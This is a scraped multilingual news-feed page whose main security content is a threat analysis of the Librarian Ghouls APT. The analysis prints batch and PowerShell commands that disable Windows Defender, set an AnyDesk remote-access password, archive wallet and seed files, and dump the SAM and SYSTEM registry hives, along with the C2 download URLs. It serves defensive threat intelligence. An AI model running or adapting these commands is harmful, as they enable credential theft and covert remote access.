Salta al contenuto principale



Crocodilus, il malware Android che minaccia crypto e app bancarie


@Informatica (Italy e non Italy 😁)
Anche l’Italia potrebbe essere tra i potenziali prossimi obiettivi di Crocodilus, il nuovo malware bancario per Android che ha già colpito diversi paesi in tutto il mondo prendendo di mira le app di accesso ai conti online e i wallet di criptovalute. Ecco tutti i dettagli e i



L’Agentic AI per potenziare i SOC, per una protezione a 360 gradi


@Informatica (Italy e non Italy 😁)
Con Purple AI Athena, SentinelOne ha dotato l’Agentic AI proprietaria di maggiore efficacia sulla scorta dell’esperienza accumulata nel tempo. Il risultato è una tecnologia in grado di rendere più efficaci e snelli i Security Operation Center aziendali
L'articolo L’Agentic AI per potenziare i SOC,



Il J-36 esce dall’ombra. Nuove informazioni sul super aereo cinese

@Notizie dall'Italia e dal mondo

In un mondo dominato dalle guerre d’informazione e dalla diplomazia della tecnologia, un’apparentemente semplice fotografia può valere un segreto militare cruciale. È il caso della nuova immagine del presunto J‑36, il caccia stealth pesante di sesta generazione sviluppato dalla Cina, comparsa di recente online




Phone numbers are a goldmine for SIM swappers. A researcher found how to get this precious piece of information from any Google account.#wired #News


A Researcher Figured Out How to Reveal Any Phone Number Linked to a Google Account


This article was produced with support from WIRED.

A cybersecurity researcher was able to figure out the phone number linked to any Google account, information that is usually not public and is often sensitive, according to the researcher, Google, and 404 Media’s own tests.

The issue has since been fixed but at the time presented a privacy issue in which even hackers with relatively few resources could have brute forced their way to peoples’ personal information.

“I think this exploit is pretty bad since it's basically a gold mine for SIM swappers,” the independent security researcher who found the issue, who goes by the handle brutecat, wrote in an email. SIM swappers are hackers who take over a target's phone number in order to receive their calls and texts, which in turn can let them break into all manner of accounts.

In mid-April, we provided brutecat with one of our personal Gmail addresses in order to test the vulnerability. About six hours later, brutecat replied with the correct and full phone number linked to that account.

“Essentially, it's bruting the number,” brutecat said of their process. Brute forcing is when a hacker rapidly tries different combinations of digits or characters until finding the ones they’re after. Typically that’s in the context of finding someone’s password, but here brutecat is doing something similar to determine a Google user’s phone number.

Upgrade to continue reading


Become a paid member to get access to all premium content
Upgrade




Local police, state authorities, DHS, and the military all flew aircraft over the Los Angeles protests this weekend, according to flight path data.#News
#News


I governanti di Tel Aviv lo avevano detto “bloccheremo la nave dei selfie” insultando così la piccola imbarcazione Madleen, della Freedom Flottilla che, con 12 pacifisti disarmati, ha cercato di portare aiuti a Gaza. La nave è stata fermata in acque internazionali, attaccata con gas urticanti, i suoi contatti col mondo sono stati disattivati. Un’operazione [...]


#NotiziePerLaScuola
È disponibile il nuovo numero della newsletter del Ministero dell’Istruzione e del Merito.
🔶 #Maturità2025, online le commissioni d'Esame. Saranno 524.


#NoiSiamoLeScuole questa settimana è dedicato all’IC “Achille Pace” e all’IIS “Ettore Majorana” di Termoli (CB), al Liceo scientifico dell’Istituto Omnicomprensivo “Mattioli-D’Acquisto” di San Salvo (CH) e all’IIS “Alessandrini” di Montesilvano (PE),…


Se avete dei dubbi sugli #EsamidiStato2025, scriveteci nei commenti le vostre domande e nei prossimi giorni pubblicheremo le risposte!

Continuate a seguirci per aggiornamenti sulla #Maturità2025 e taggateci nei vostri post e nelle vostre stories con…



🌱Il #5giugno si celebra la Giornata Mondiale dell’Ambiente, istituita nel 1972 dall’Assemblea Generale delle Nazioni Unite per sensibilizzare sui temi della salvaguardia del nostro ambiente naturale.


📚Vi state preparando agli #EsamidiStato2025?
🗓️Qui trovate le date da segnare sul calendario!

Continuate a seguirci per aggiornamenti sulla #Maturità2025 e taggateci nei vostri post e nelle vostre stories con l’hashtag #MIMaturo.



📣 #Maturità2025, online le commissioni dell’Esame conclusivo del II ciclo di istruzione!
Saranno 524.415 gli studenti coinvolti, 13.900 le commissioni.

Qui il motore di ricerca delle commissioni▶️ matesami.pubblica.istruzione.



È stato approvato definitivamente dal Parlamento il disegno di legge di conversione del Dl n. 45/2025, dedicato alle “Disposizioni urgenti in materia di attuazione delle misure del PNRR in materia di istruzione e merito e per l’avvio dell’anno scolas…


#NotiziePerLaScuola
È disponibile il nuovo numero della newsletter del Ministero dell’Istruzione e del Merito.


#Scuola, misure complessive per 369 milioni di euro per i campus e il potenziamento dei laboratori.

ll Ministro dell’Istruzione e del Merito, Giuseppe Valditara, ha varato una serie di provvedimenti volti a potenziare la filiera tecnologico-profess…



#NoiSiamoLeScuole questa settimana è dedicato a tre scuole del Lazio: l’IC Luigi Pirandello di Fonte Nuova, che ha costruito una mensa di 330 mq per 420 bambini, l’IC Casalotti 259 di Roma che ha avviato 41 nuovi percorsi STEM e linguistici e l’IC De…


🏆 Nell’ambito delle celebrazioni per la #FestadellaRepubblica, si è svolta ieri a Roma la premiazione delle scuole vincitrici del primo #concorso nazionale sul ruolo delle Forze Armate e del Militare italiano e sugli articoli 11 e 52 della Costituzio…


Sleep with one eye open: how Librarian Ghouls steal data by night



Introduction


Librarian Ghouls, also known as “Rare Werewolf” and “Rezet”, is an APT group that targets entities in Russia and the CIS. Other security vendors are also monitoring this APT and releasing analyses of its campaigns. The group has remained active through May 2025, consistently targeting Russian companies.

A distinctive feature of this threat is that the attackers favor using legitimate third-party software over developing their own malicious binaries. The malicious functionality of the campaign described in this article is implemented through command files and PowerShell scripts. The attackers establish remote access to the victim’s device, steal credentials, and deploy an XMRig crypto miner in the system.

Our research has uncovered new tools within this APT group’s arsenal, which we will elaborate on in this article.

Technical details

Initial infection vector


Attacks by Librarian Ghouls continued almost unabated throughout 2024. We observed a slight decline in the group’s activity in December, followed immediately by a new wave of attacks, which is ongoing. The group’s primary initial infection vector involves targeted phishing emails that contain password-protected archives with executable files inside. These malicious emails are typically disguised as messages from legitimate organizations, containing attachments that appear to be official documents. The infection process is as follows: the victim opens the attached archive (the password is usually provided in the email body), extracts the files inside, and opens them.

We managed to get hold of a malicious implant from an archive disguised as a payment order. The sample is a self-extracting installer made with the Smart Install Maker utility for Windows.

The installer contains three files: an archive, a configuration file, and an empty file irrelevant for our analysis. They are later renamed into data.cab, installer.config and runtime.cab respectively.

The primary malicious logic resides in the installer’s configuration file. It uses a variety of registry modification commands to automatically deploy the legitimate window manager, 4t Tray Minimizer, onto the system. This software can minimize running applications to the system tray, allowing attackers to obscure their presence on the compromised system.

Once 4t Tray Minimizer is installed, the installer pulls three files from data.cab and puts them into the C:\Intel directory, specifically at:

FileName when archivedPath on the infected system
Legitimate PDF as a decoy0 \Intel\Payment Order # 131.pdf
Legitimate curl utility executable1\Intel\curl.exe
LNK file2\Intel\AnyDesk\bat.lnk

The PDF decoy resembles an order to pay a minor amount:

PDF document imitating a payment order
PDF document imitating a payment order

rezet.cmd


Once data.cab is unpacked, the installer generates and executes a rezet.cmd command file, which then reaches out to the C2 server downdown[.]ru, hosting six files with the JPG extension. rezet.cmd downloads these to C:\Intel, changing their file extensions to: driver.exe, blat.exe, svchost.exe, Trays.rar, wol.ps1, and dc.exe.

  • driver.exe is a customized build of rar.exe, the console version of WinRAR 3.80. This version has had user dialog strings removed: it can execute commands but provides no meaningful output to the console.
  • blat.exe is Blat, a legitimate utility for sending email messages and files via SMTP. Attackers use this to send data they steal to an email server they control.
  • svchost.exe is the remote access application AnyDesk. Attackers use this to remotely control the compromised machine.
  • dc.exe is Defender Control, which allows disabling Windows Defender.

After downloading the files, the script uses the specified password and the driver.exe console utility to extract Trays.rar into the same C:\Intel directory and run the unpacked Trays.lnk. This shortcut allows starting 4t Tray Minimizer minimized to the tray.

Next, the script installs AnyDesk on the compromised device and downloads a bat.bat file from the C2 server to C:\Intel\AnyDesk. Finally, rezet.cmd runs bat.lnk, which was previously extracted from data.cab.

bat.bat


Opening the bat.lnk shortcut runs the bat.bat batch file, which executes a series of malicious actions.

Disabling security measures and a scheduled task


First, the BAT file sets the password QWERTY1234566 for AnyDesk, which allows the attackers to connect to the victim’s device without asking for confirmation.

Next, the script uses the previously downloaded Defender Control (dc.exe) application to disable Windows Defender.

To verify that the victim’s computer is on and available for remote connections, the batch file runs the powercfg utility six times with different parameters. This utility controls the local machine’s power settings.

Next, bat.bat runs the schtasks utility to create a ShutdownAt5AM scheduler task, which shuts down the victim’s PC every day at 5 AM as the name suggests. It is our assessment that the attackers use this technique to cover their tracks so that the user remains unaware that their device has been hijacked.
echo QWERTY1234566 | AnyDesk.exe --set-password _unattended_access
%SYSTEMDRIVE%\Intel\dc.exe /D
powercfg -setacvalueindex SCHEME_CURRENT 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0
powercfg -change -standby-timeout-ac 0
powercfg -change -hibernate-timeout-ac 0
powercfg -h off
powercfg /SETDCVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 bd3b718a-0680-4d9d-8ab2-e1d2b4ac806d 1
powercfg /SETACVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 bd3b718a-0680-4d9d-8ab2-e1d2b4ac806d 1
schtasks /create /tn "ShutdownAt5AM" /tr "shutdown /s /f /t 0" /sc daily /st 05:00

Disabling security measures and the power management configuration in bat.bat

Wakeup script and data theft


Next, the batch file executes the wol.ps1 script via PowerShell.
$Action = New-ScheduledTaskAction -Execute "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
$Trigger = New-ScheduledTaskTrigger -Daily -At "01:00AM"
$Principal = New-ScheduledTaskPrincipal -UserId "SYSTEM" -LogonType ServiceAccount -RunLevel Highest
# Creating task settings
$TaskSettings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -StartWhenAvailable -WakeToRun
# Registering task in Task Scheduler
Register-ScheduledTask -Action $Action -Principal $Principal -Trigger $Trigger -TaskName "WakeUpAndLaunchEdge" -Settings $TaskSettings -Force

Contents of the “wol.ps1” script

This script launches Microsoft Edge every day at 1 AM. We found no evidence of msedge.exe being replaced or compromised, leading us to believe it is a genuine Microsoft Edge executable. This daily browser activation wakes the victim’s computer, giving attackers a four-hour window to establish unauthorized remote access with AnyDesk before the scheduled task shuts the machine down at 5 AM.

Following the execution of the PowerShell script, bat.bat removes the curl utility, the Trays.rar archive, and the AnyDesk installer. The attackers no longer need these components: at this stage of the infection, all necessary malicious files and third-party utilities have been downloaded with curl, Trays.rar has been unpacked, and AnyDesk has been installed on the device.

After that, the batch file sets environment variables for Blat. These variables contain, among other things, the email addresses where the victim’s data will be sent and the passwords for these accounts.

The next step is to collect information stored on the device that is of interest to the attackers:

  • Cryptocurrency wallet credentials and seed phrases
  • Dumps of the HKLM\SAM and HKLM\SYSTEM registry keys made with reg.exe


%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\*парол*.* /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\*карт*.* /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\*кошельк*.* /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\wallet.dat /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\*wallet*.doc* /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\*wallet*.txt /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\*seed*.* /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\keystore.json /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\*bitcoin*.* /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\*usdt*.* /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar C:\*ethereum*.* /y
reg save hklm\sam %SYSTEMDRIVE%\Intel\sam.backup
reg save hklm\system %SYSTEMDRIVE%\Intel\system.backup
Data collection by bat.bat

The BAT file uses driver.exe to pack data it has collected into two separate password-protected archives. Then, the script runs blat.exe to send the victim’s data and AnyDesk configuration files to the attackers via SMTP.

Miner installation and self-deletion


Next, bat.bat deletes the files generated during the attack from the C:\Intel\ folder and installs a crypto miner on the compromised system. To do this, the script creates a bm.json configuration file containing the mining pool address and the attackers’ identifier, and then downloads install.exe from hxxp://bmapps[.]org/bmcontrol/win64/Install.exe.

install.exe is an installer that checks for the JSON configuration file and the bmcontrol.exe process in the system. If the process is detected, the installer terminates it.

Then, install.exe downloads an archive with mining tools from hxxps://bmapps[.]org/bmcontrol/win64/app-1.4.zip.

The archive contains the following files:

  • _install.exe: a new version of the installer. While the samples in the attacks we analyzed were identical, we suspect the attackers have a scenario for updating the malware.
  • bmcontrol.exe: miner controller
  • run.exe, stop.cmd, uninstall.cmd: tools for starting, stopping, and removing the controller
  • XMRig miner

Depending on the parameters of the JSON file, the unmodified original installer file is used, or _install.exe is renamed to install.exe and run. After that, the installer adds run.exe to autorun. This utility checks for an already running bmcontrol.exe controller on the compromised system, and if it doesn’t find one, runs it from the downloaded archive.

Once running, bmcontrol.exe creates two processes: master and worker. The master process launches and constantly monitors the worker, and also restarts it if the latter quits unexpectedly. In addition, the master passes the JSON configuration file to the worker process.

Before launching the XMRig miner, the worker process collects the following system information:

  1. Available CPU cores
  2. Available RAM
  3. GPU

This data is used to configure the miner on the compromised device and also sent to the attackers’ server. While XMRig is running, the worker maintains a connection to the mining pool, sending a request every 60 seconds.

After installing the miner on the system, bat.bat removes itself from the victim’s device.

Legitimate software utilized by the attackers


It is a common technique to leverage third-party legitimate software for malicious purposes (T1588.002), which makes detecting and attributing APT activity more difficult. We have seen this pattern in current campaigns by various APT groups, in particular in the Likho cluster.

Beyond the utilities discussed above, we also identified the following software in Librarian Ghouls attacks:

  • Mipko Personal Monitor: a DLP system that the attackers use to monitor the victim. The application can collect screenshots and record keystrokes among other things.
  • WebBrowserPassView: a password recovery utility that can extract passwords stored in web browsers. The attackers use this to steal victims’ credentials.
  • ngrok: a global reverse proxy that secures and accelerates network services. Used by the attackers to connect to target machines.
  • NirCmd: a legitimate utility that facilitates various OS tasks without a visible user interface. The attackers use this to covertly run scripts and executables.


Phishing campaign


Our investigation revealed several domains that we assess with low confidence to be associated with the ongoing Librarian Ghouls campaign. At the time of the investigation, some of them remained active, including users-mail[.]ru and deauthorization[.]online. These domains hosted phishing pages, generated with PHP scripts and designed to harvest credentials for the mail.ru email service.

Example of a phishing page associated with the APT campaign
Example of a phishing page associated with the APT campaign

Infrastructure


The implant detailed in this article communicated with the command-and-control servers downdown[.]ru and dragonfires[.]ru. Both resolve to the IP address 185.125.51[.]5.

Our analysis of the attackers’ infrastructure revealed a notable characteristic: several malicious web servers associated with this campaign had directory listing enabled, allowing us to inspect files they stored.

Directory listing on a malicious server
Directory listing on a malicious server

Victims


Our telemetry indicated that, during the investigation period, hundreds of Russian users fell victim to this campaign. It primarily focuses on industrial enterprises, with engineering schools also being a target of interest. Furthermore, the attacks described also impacted users in Belarus and Kazakhstan.

The phishing emails are notably composed in Russian and include archives with Russian filenames, along with Russian-language decoy documents. This suggests that the primary targets of this campaign are likely based in Russia or speak Russian.

About the attackers


Librarian Ghouls APT exhibits traits commonly associated with hacktivist groups, such as the use of self-extracting archives and a reliance on legitimate, third-party utilities rather than custom-built malware binary modules.

Since the beginning of the current campaign in December 2024, we have seen frequent updates to the implants, which vary in configuration files and the bundled sets of legitimate utilities. At the time of publishing this, our data encompassed over 100 malicious files connected to this campaign.

Takeaways


At the time of this report’s release, the Librarian Ghouls APT campaign described in it is still active, as evidenced by attacks we observed in May 2025. Consistent with previous activity, the attackers leverage third-party legitimate utilities rather than developing custom tools. All of the malicious functionality still relies on installer, command, and PowerShell scripts. We observe that the attackers are continuously refining their tactics, encompassing not only data exfiltration but also the deployment of remote access tools and the use of phishing sites for email account compromise. We constantly monitor this threat actor and will continue to share up-to-date information about its activity.

Indicators of compromise


* Additional indicators of compromise and a YARA rule for detecting Librarian Ghouls activity are available to customers of our APT Intelligence Reporting service. Contact intelreports@kaspersky.com for more details.

Implants


d8edd46220059541ff397f74bfd271336dda702c6b1869e8a081c71f595a9e68
2f3d67740bb7587ff70cc7319e9fe5c517c0e55345bf53e01b3019e415ff098b
de998bd26ea326e610cc70654499cebfd594cc973438ac421e4c7e1f3b887617
785a5b92bb8c9dbf52cfda1b28f0ac7db8ead4ec3a37cfd6470605d945ade40e
c79413ef4088b3a39fe8c7d68d2639cc69f88b10429e59dd0b4177f6b2a92351
53fd5984c4f6551b2c1059835ea9ca6d0342d886ba7034835db2a1dd3f8f5b04

Implant configuration files


f8c80bbecbfb38f252943ee6beec98edc93cd734ec70ccd2565ab1c4db5f072f
4d590a9640093bbda21597233b400b037278366660ba2c3128795bc85d35be72
1b409644e86559e56add5a65552785750cd36d60745afde448cce7f6f3f09a06
7c4a99382dbbd7b5aaa62af0ccff68aecdde2319560bbfdaf76132b0506ab68a
702bf51811281aad78e6ca767586eba4b4c3a43743f8b8e56bb93bc349cb6090
311ec9208f5fe3f22733fca1e6388ea9c0327be0836c955d2cf6a22317d4bdca

Malicious archive attachments


fd58900ea22b38bad2ef3d1b8b74f5c7023b8ca8a5b69f88cfbfe28b2c585baf
e6ea6ce923f2eee0cd56a0874e4a0ca467711b889553259a995df686bd35de86
6954eaed33a9d0cf7e298778ec82d31bfbdf40c813c6ac837352ce676793db74

Malicious BAT files


e880a1bb0e7d422b78a54b35b3f53e348ab27425f1c561db120c0411da5c1ce9
c353a708edfd0f77a486af66e407f7b78583394d7b5f994cd8d2e6e263d25968
636d4f1e3dcf0332a815ce3f526a02df3c4ef2890a74521d05d6050917596748
c5eeec72b5e6d0e84ff91dfdcbefbbbf441878780f887febb0caf3cbe882ec72
8bdb8df5677a11348f5787ece3c7c94824b83ab3f31f40e361e600576909b073
2af2841bf925ed1875faadcbb0ef316c641e1dcdb61d1fbf80c3443c2fc9454f

Decoy documents


cab1c4c675f1d996b659bab1ddb38af365190e450dec3d195461e4e4ccf1c286
dfac7cd8d041a53405cc37a44f100f6f862ed2d930e251f4bf22f10235db4bb3
977054802de7b583a38e0524feefa7356c47c53dd49de8c3d533e7689095f9ac
65f7c3e16598a8cb279b86eaeda32cb7a685801ed07d36c66ff83742d41cd415
a6ff418f0db461536cff41e9c7e5dba3ee3b405541519820db8a52b6d818a01e
6c86608893463968bfda0969aa1e6401411c0882662f3e70c1ac195ee7bd1510

Malicious PS1 scripts


8b6afbf73a9b98eec01d8510815a044cd036743b64fef955385cbca80ae94f15
7d6b598eaf19ea8a571b4bd79fd6ff7928388b565d7814b809d2f7fdedc23a0a
01793e6f0d5241b33f07a3f9ad34e40e056a514c5d23e14dc491cee60076dc5a

Miner installer (install.exe)
649ee35ad29945e8dd6511192483dddfdfe516a1312de5e0bd17fdd0a258c27f

Miner controller (bmcontrol.exe)
9cce3eaae0be9b196017cb6daf49dd56146016f936b66527320f754f179c615f

Miner launcher (run.exe)
d7bcab5acc8428026e1afd694fb179c5cbb74c5be651cd74e996c2914fb2b839

Legitimate software


AnyDesk
Blat
curl
Defender Control
Customized RAR 3.80
AnyDesk
Mipko Personal Monitor
ngrok
NirCmd
4t Tray Minimizer
WebBrowserPassView

Librarian Ghouls malicious domains


vniir[.]space
vniir[.]nl
hostingforme[.]nl
mail-cheker[.]nl
unifikator[.]ru
outinfo[.]ru
anyhostings[.]ru
center-mail[.]ru
redaction-voenmeh[.]info
acountservices[.]nl
accouts-verification[.]ru
office-email[.]ru
email-office[.]ru
email-informer[.]ru
office-account[.]ru
deauthorization[.]online
anyinfos[.]ru
verifikations[.]ru
claud-mail[.]ru
users-mail[.]ru
detectis[.]ru
supersuit[.]site
downdown[.]ru
dragonfires[.]ru
bmapps[.]org


securelist.com/librarian-ghoul…



The internal battle of digital antitrust


The internal battle of digital antitrust
IT'S MONDAY, AND THIS IS DIGITAL POLITICS. I'm Mark Scott, and will be making a flying visit to Brussels this week. If you're around and want to grab coffee on June 11, drop me a line here. My colleagues are holding a webinar on June 12 about the upcoming United Nations Internet Governance Forum. You watch along here at 9am ET / 3pm CET.

— We're entering a new era of digital competition enforcement that pits Big Tech companies' vested interests against each other.

— The traditional approach to tackling foreign interference is woefully out of date. It's time for a rethink.

— Europe's decade-long push to combat state-backed online disinformation and cyber attacks.

Let's get started:



digitalpolitics.co/newsletter0…



Texas’ Right to Repair Bill is a Signature Away From Becoming Law


In what could be a big step forward for consumer rights, the Texas Senate recently unanimously voted to pass HB 2963, which references the “Diagnosis, maintenance, and repair of certain digital electronic equipment”. If signed by the governor, this would make Texas the ninth US state to enact such a law, and the seventh pertaining to consumer electronics. Interestingly, this bill saw anti-parts pairing language added, which is something that got stripped from the Oregon bill.

Much like other Right to Repair bills, HB 2963 would require manufacturers to make spare parts, documentation and repair tools available to both consumers and independent repair shops. If signed, the act would take effect in September of 2026. Included in the bill are provisions to prevent overcharging for the provided parts and documentation.

As for how useful this is going to be for consumers, [Louis Rossmann] had a read of the bill and gave his typically eloquent thoughts. The tl;dw is that while there is a lot of stuff to like, this bill leaves open potentially massive loopholes (e.g. assemblies vs parts), while also carving out massive exemptions, which leaves owners of game consoles, boats, cars, tractors, home appliances, etc. stranded with no new options.

youtube.com/embed/C_ohgeWKcOY?…


hackaday.com/2025/06/09/texas-…



Nintendo Switch 2 Teardown, Let’s A-Go!


A new console challenger has appeared, and it goes by the name Nintendo Switch 2. The company’s latest iteration of the home console portable hybrid initially showed promise by featuring a large 1080p display, though very little official footage of the handheld existed prior to the device’s global release last week. However, thanks to a teardown video from [TronicsFix], we’ve got a little more insight into the hardware.

The technical specifications of this new console have been speculated on for the last handful of years. We now know NVIDIA is again providing the main silicon in the form of a custom 8x ARM Cortex A78C processor. Keeping the system powered is a 5220 mAh lithium ion battery that according to [TronicsFix] is held in with some seriously strong adhesive.

On the plus side for repairability, the onboard microphone and headphone jack are each attached by their own ribbon cable to the motherboard. The magnetic controller interfaces are also modular in design as they may one day prove to be a point of failure from repeated detachment. Speaking of which, [TronicsFix] also took apart the new version of the Joy-Con controller that ships with the system.

Arguably the biggest pain point for owners of the original Nintendo Switch was the reliability of the analog sticks on the diminutive controllers. There were widespread reports of “stick drift” that caused players to lose control as onscreen avatars would lazily move in one direction without player input. For the Switch 2, the Joy-Con controllers feature roughly the same number of dome switch buttons as well as haptic feedback motors. The analog sticks are larger in size on the outside, but feature the same general wiper/resistor design of the original. Many will cry foul of the continued use of conventional analog stick design in favor of hall effect sensors, but only time will tell if the Nintendo Switch 2 will repeat history.

youtube.com/embed/TaNmhUKtgzs?…


hackaday.com/2025/06/09/ninten…



Exploit RCE per SonicWall SRA 4600 in vendita a 60.000 dollari: allarme sicurezza per CVE-2025-2170


Un Threat actor noto con lo pseudonimo skart7 ha recentemente pubblicato sul forum underground chiuso Exploit un annuncio per la vendita di un exploit pre-auth RCE che colpisce i dispositivi SonicWall SRA 4600.

L’exploit consente l’esecuzione di codice arbitrario da remoto (RCE) senza autenticazione, rendendolo estremamente pericoloso per le organizzazioni che utilizzano questi dispositivi per l’accesso remoto.

Secondo quanto riportato nel post, l’exploit colpisce versioni firmware precedenti alla 9.0.0.10 o 10.2.0.7. Il venditore dichiara che l’exploit è completamente affidabile, compatibile con le configurazioni di default e non richiede alcuna interazione da parte dell’utente.

Questa vulnerabilità è coerente con quanto riportato nel bollettino ufficiale SonicWall relativo alla CVE-2025-2170, che descrive una falla critica nei dispositivi SMA1000 (di cui SRA 4600 è parte della stessa famiglia legacy). La vulnerabilità consente a un attaccante remoto non autenticato di eseguire comandi arbitrari sfruttando una debolezza nell’interfaccia di gestione.

  • CVE: CVE-2025-2170
  • CVSS: 9.8 (Critico)
  • Tipo: Remote Code Execution (pre-auth)
  • Dispositivi affetti: SonicWall SRA 4600, SMA1000
  • Patch disponibile: Sì, tramite aggiornamento firmware


Il profilo dell’attore: skart7


L’utente skart7 non è nuovo alla scena underground. Nell’ultimo periodo ha pubblicato diversi exploit :

  • SonicWall SRA 4600 – RCE pre-auth, root access, 60.000 USD
  • TerraMaster NAS – RCE pre-auth, root access, compatibile con tutte le versioni 4.x e 5.x
  • Cisco ISE – RCE pre-auth, root access, nessuna interazione richiesta



Tutti gli annunci condividono lo stesso TOX ID e sessione, suggerendo un singolo attore o gruppo ben strutturato. Le descrizioni sono tecnicamente dettagliate, e l’attore accetta transazioni tramite escrow del forum, una pratica che rafforza la sua reputazione come venditore affidabile nel contesto underground.

Le Tattiche, Tecniche e Procedure (TTPs) si basano sullo sfruttamento di vulnerabilità RCE pre-auth su dispositivi esposti pubblicamente. Raccomandiamo di applicare quanto prima le patch ufficiali SonicWall per i dispositivi SRA/SMA, i Firmware aggiornati sono disponibili sul portale ufficiale SonicWall. Isolare i dispositivi di accesso remoto dal resto della rete interna tramite segmentazione e implementare sistemi di IDS/IPS per rilevare attività anomale o tentativi di exploit. Inoltre, limitare l’accesso all’interfaccia di gestione solo da IP autorizzati.

La vendita di exploit RCE pre-auth da parte di attori come skart7 rappresenta una minaccia concreta e immediata. La combinazione di vulnerabilità critiche, dispositivi esposti e attori motivati economicamente crea un contesto ad alto rischio. Le organizzazioni devono agire proattivamente per mitigare queste minacce, aggiornando i sistemi e rafforzando le difese perimetrali.

L'articolo Exploit RCE per SonicWall SRA 4600 in vendita a 60.000 dollari: allarme sicurezza per CVE-2025-2170 proviene da il blog della sicurezza informatica.



Rilasciato un PoC su GitHub per la vulnerabilità critica RCE nei prodotti Fortinet


Negli ultimi giorni è stato pubblicato su GitHub un proof-of-concept (PoC) per il bug di sicurezza monitorato con il codice CVE-2025-32756, una vulnerabilità critica che interessa diversi prodotti Fortinet.

L’exploit dimostra la possibilità di eseguire codice arbitrario da remoto, in maniera non autenticata, sfruttando un buffer overflow nello stack causato da un errore nella gestione dei cookie AuthHash.

Questa vulnerabilità espone infrastrutture critiche a gravi rischi di compromissione in caso di mancata mitigazione. La possibilità di eseguire codice arbitrario da remoto, senza autenticazione, può consentire:

  • Il controllo completo del dispositivo vulnerabile
  • La movimentazione laterale nella rete
  • L’installazione di malware o l’esfiltrazione di dati sensibili

Il PoC, scritto in Python e reso disponibile pubblicamente, permette di simulare un attacco inviando un payload mirato a un dispositivo Fortinet esposto.

L’esecuzione è semplice: basta fornire l’indirizzo IP del bersaglio e, opzionalmente, la porta e l’output di debug. Questa semplicità di utilizzo rende il PoC uno strumento potenzialmente pericoloso, soprattutto considerando che la vulnerabilità non richiede alcuna autenticazione preliminare. Come specificato nel repository, lo script è inteso esclusivamente per scopi educativi e di ricerca, da utilizzare solo su sistemi propri o con esplicita autorizzazione.

Fortinet ha già rilasciato patch correttive per tutti i prodotti interessati. Le versioni aggiornate che risolvono il problema includono, ad esempio, FortiVoice dalla 7.2.1 in su, FortiMail dalla 7.6.3, FortiNDR dalla 7.6.1, e così via.

È fortemente raccomandato che gli amministratori di sistema verifichino immediatamente le versioni in uso e aggiornino i dispositivi per mitigare il rischio di compromissione. In ambienti non aggiornati, un attacco sfruttando questa vulnerabilità potrebbe avere impatti devastanti sulla sicurezza dell’infrastruttura aziendale.

La pubblicazione dell’exploit su GitHub potrebbe incentivare l’abuso della vulnerabilità da parte di cybercriminali, in particolare gruppi ransomware o attori statali.

La facilità di esecuzione dell’attacco, combinata con la natura critica della falla, aumenta il livello d’urgenza. Questa vicenda sottolinea ancora una volta l’importanza di un processo di patch management rapido ed efficace, soprattutto quando si tratta di tecnologie perimetrali come quelle Fortinet, spesso esposte direttamente su Internet.

L'articolo Rilasciato un PoC su GitHub per la vulnerabilità critica RCE nei prodotti Fortinet proviene da il blog della sicurezza informatica.



Federazione Russa: 8 Anni di Carcere per un attacco DDoS! La nuova Legge Shock in Arrivo


Secondo quanto riportato dai media, il governo russo ha preparato degli emendamenti al Codice penale, introducendo la responsabilità per gli attacchi DDoS: la pena massima potrebbe includere una multa fino a 2 milioni di rubli (circa 22.000 euro) e fino a otto anni di reclusione.

Come riportato da Kommersant, la criminalizzazione degli attacchi DDoS fa parte del secondo pacchetto di misure per combattere la criminalità informatica, sviluppato dal Ministero dello Sviluppo Digitale insieme agli operatori di mercato e che riguarda una decina di leggi federali. Il nuovo pacchetto include diverse decine di nuove misure, nonché integrazioni ai Codici Penale, di Procedura Penale e Amministrativo.

Come precedentemente segnalato da un rappresentante dell’ufficio del vice primo ministro Dmitry Grigorenko, il documento è attualmente in fase di approvazione interdipartimentale e potrebbe essere modificato tenendo conto delle proposte dei dipartimenti e dell’industria. In una delle proposte, gli autori del documento propongono di introdurre l’articolo 272.2 “Impatto dannoso su un sistema informatico, una rete di informazione e telecomunicazioni, un sistema informatico o una rete di telecomunicazioni” nel Codice penale che dovrebbe definire la punizione per gli attacchi DDoS.

La pena massima prevista dall’articolo è una multa fino a 2 milioni di rubli, la reclusione fino a otto anni e l’interdizione da determinate posizioni fino a tre anni. Tuttavia, la bozza prevede un’eccezione per gli individui che hanno attaccato risorse “il cui accesso è vietato o limitato dalla legge”. Essi non sono ritenuti responsabili per tali azioni. Il documento definisce un atto punibile come “influenza mirata” sui sistemi informatici, che “è associata al blocco o alla distruzione di informazioni informatiche, causando danni significativi o comportando altre gravi conseguenze”.

